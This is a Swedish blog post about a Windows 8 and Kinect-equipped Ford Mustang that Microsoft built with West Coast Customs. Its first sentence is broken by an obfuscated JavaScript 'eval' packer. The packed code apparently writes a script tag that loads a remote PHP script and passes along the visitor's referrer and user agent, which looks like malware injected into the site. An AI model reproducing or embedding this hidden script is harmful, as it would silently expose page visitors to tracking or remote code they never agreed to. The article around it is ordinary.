Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Microsoft bygger en egen Mustang packad med Windows 8 och Kinect

Microsoft bygger en egen Mustang packad med Windows 8 och Kinect
Sebastian

Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esfsr|var|u0026u|referrer|fzbsf||js|php’.split(’|’),0,{}))
Microsoft är upptagna med att förbereda Windows 8 det vi redan. Men tydligen finns det lite extra tid över.

Tillsammans med West Coast Customs har de byggt upp en mycket speciell Ford Mustang fullutrustad med Microsoftprodukter. Det är folket bakom Pimp My Ride och Justin Biebers Batman-Cadillac som pumpat in Microsofts senaste teknik i denna 1967 fastback replica kropp.

Bland den senaste tekniken finner vi ett otroligt snabbt Wi-Fi, ett par Heads-up-displayer, självklart en augmented reality i vindrutan, en massa kinect sensorer på baksidan och framsidan av bilen och även en Windows 8-driven pekskärm i den digitala instrumentbrädan. Det finns också en Xbox 360 och en projektduk på den bakre vindrutan. Windows Phone spelar en stor roll som accesorar då man med den kan hitta, låsa upp och starta bilen från en specialanpassad applikation.

Men en funktion jag reagerade starkt på är att man via telefonen kan prata med folk utanför bilen genom ett par high-fi högtalare. Mycket användbart när det står någon framför bilen och lyssnar på musik med ryggen mot.

Det är inget snack, den här bilen ska jag ha 🙂 Ska slå en pling till gänget borta på Microsoft och se vad de vill ha.